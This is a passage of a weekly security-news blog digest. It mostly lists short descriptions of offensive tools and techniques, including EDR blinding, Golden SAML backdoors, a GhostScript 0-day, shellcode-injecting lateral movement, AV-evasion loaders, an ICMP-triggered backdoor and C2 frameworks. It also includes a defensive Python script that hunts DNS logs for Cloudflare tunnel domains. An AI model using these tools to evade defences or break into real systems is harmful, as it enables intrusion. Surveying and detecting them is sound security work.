  • Widespread credential phishing campaign abuses open redirector links. Most commercial email providers scan links for reputation and can prevent phishing links from being opened. Attackers are now using open redirects on "trusted" sites to bypass these protections and deliver their payloads/load their pages. These are also combined with reCAPTCHA protections to prevent automated scanning.
  • Backdoor Office 365 and Active Directory - Golden SAML. This quick post shows the 8 steps to generate a golden SAML token as well as some detections.
  • Blinding EDR On Windows. This is a great post that brings together a lot of information about AV/EDR as well as kernel drivers, driver signing, and how to use kernel drivers against EDRs.

Tools and Exploits

  • Quick Tunnels: Anytime, Anywhere. Cloudflare tunnels are available without an account. They use 4x HTTPS connections to Cloudflare IPs to tunnel traffic to anything the cloudflared binary can reach. Consider this a more trusted version of ngrok. "Unless you delete them, Tunnels can live for months." Defenders, look for update.argotunnel.com, h2.cftunnel.com, and trycloudflare.com based on my testing.
  • RCE-0-day-for-GhostScript-9.50. This 0-day exploit affects ImageMagick with the default settings from the Ubuntu repository (tested with default settings of ImageMagick on Ubuntu 20.04). More info here.
  • LiquidSnake is a program aimed at performing lateral movement against Windows systems without touching the disk. The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory; the .NET assembly will listen for shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection technique.
  • NSGenCS is an extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. More information at The Birth of NSGenCS.
  • AWS ReadOnlyAccess: Not Even Once. ReadOnlyAccess sounds secure, but it can cause a false sense of security and is usually too broad for whatever is actually needed.
  • OpenBMC: remote code execution in netipmid. IPMI is a very powerful interface with tons of bugs. Add this RCE to your next internal assessment bag of tricks.
  • iHide is a utility for hiding jailbreaks from iOS applications. This can be a huge help when doing security assessments on applications with pesky jailbreak detection. See the blog post for more info.
  • PR0CESS has a few projects for interesting PE loading techniques.
  • CVE-2021-33909 is a Linux LPE for Sequoia.
  • laurel is a tool to transform Linux Audit logs into JSON for SIEM usage.
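The Quick Tunnels item above ends with three domains worth hunting for in DNS telemetry. The following is an added example for this post (not code from Cloudflare or from any tool linked here) that runs that hunt over JSON DNS log lines and reports, per source host, which indicator names it resolved. The log lines are constructed for the example; they borrow the `ts`, `id.orig_h` and `query` field names of a Zeek dns.log in JSON form but are not real captures.

```python
"""Hunt DNS logs for names associated with cloudflared / Quick Tunnels.

Added example, not part of the original post. The indicator list is the
one given in the post; the log lines below are constructed.
"""
import json
from collections import defaultdict

# Domains named in the post. Matching is per DNS label so that
# "abc-def.trycloudflare.com" matches but "nottrycloudflare.com" does not.
TUNNEL_INDICATORS = (
    "update.argotunnel.com",
    "h2.cftunnel.com",
    "trycloudflare.com",
)


def _labels(name):
    """Normalise a DNS name to a lower-case label list without trailing dot."""
    return name.rstrip(".").lower().split(".")


def matches_indicator(query):
    """Return the indicator that `query` equals or is a subdomain of, or None."""
    q = _labels(query)
    for ind in TUNNEL_INDICATORS:
        i = _labels(ind)
        if len(q) >= len(i) and q[-len(i):] == i:
            return ind
    return None


def hunt(lines):
    """Yield (ts, source host, query, indicator) for every matching log line."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the hunt
        query = rec.get("query")
        if not query:
            continue
        ind = matches_indicator(query)
        if ind:
            yield rec.get("ts"), rec.get("id.orig_h"), query, ind


def summarise(lines):
    """Map source host -> sorted list of indicators that host resolved."""
    per_host = defaultdict(set)
    for _ts, src, _query, ind in hunt(lines):
        per_host[src].add(ind)
    return {host: sorted(inds) for host, inds in per_host.items()}


# Constructed sample log: two hosts touching tunnel infrastructure, one
# benign lookup, one look-alike name, and one malformed line.
SAMPLE_LOG = """
{"ts": "2021-09-01T12:00:01Z", "id.orig_h": "10.0.0.5", "query": "www.example.com"}
{"ts": "2021-09-01T12:00:02Z", "id.orig_h": "10.0.0.5", "query": "update.argotunnel.com"}
{"ts": "2021-09-01T12:00:03Z", "id.orig_h": "10.0.0.5", "query": "h2.cftunnel.com"}
{"ts": "2021-09-01T12:00:04Z", "id.orig_h": "10.0.0.7", "query": "tidy-words-here.trycloudflare.com"}
{"ts": "2021-09-01T12:00:05Z", "id.orig_h": "10.0.0.9", "query": "nottrycloudflare.com"}
not json at all
"""

if __name__ == "__main__":
    for host, inds in summarise(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {', '.join(inds)}")
```

Feed `hunt()` a file object of real JSON lines to stream a large log; `summarise()` is the quick triage view. The label-wise suffix match is what keeps `trycloudflare.com` from also firing on unrelated names that merely end in the same characters, and it catches the per-tunnel random subdomains the service hands out.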

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • packetsifterTool is a tool/script that is designed to aid analysts in sifting through a packet capture (pcap) to find noteworthy traffic. Packetsifter accepts a pcap as an argument and outputs several files.
  • zuthaka is a collaborative free open-source Command & Control integration framework that allows developers to concentrate on the core function and goal of their C2.
  • JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a "magic" ICMP packet instructing the backdoor to either callback or listen.
  • beacon_health_check is an aggressor script that uses a beacon's note field to indicate the health status of a beacon.
  • Khepri is a post-exploitation tool written in Golang and C++, with architecture and usage like Cobalt Strike. So much like Cobalt Strike that a casual look at the screenshot could confuse the two!
  • ockam is a library for end-to-end encryption and mutual authentication for distributed applications.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-09-14

By: Erik
15 September 2021 at 00:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-09-07 to 2021-09-14 (bonus day!).

News

Techniques

Tools and Exploits

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • wwwgrep is a rapid search “grepping” mechanism that examines HTML elements by type and permits focused (single), multiple (file based URLs) and recursive (with respect to root domain or not) searches to be performed.
  • AppInitHook is a global user-mode hooking framework, based on AppInit_DLLs. The goal is to allow you to rapidly develop hooks to inject in an arbitrary process. Developed to reverse engineer and customize random applications, it has broad implications for red teaming.
  • ElusiveMice is a Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.
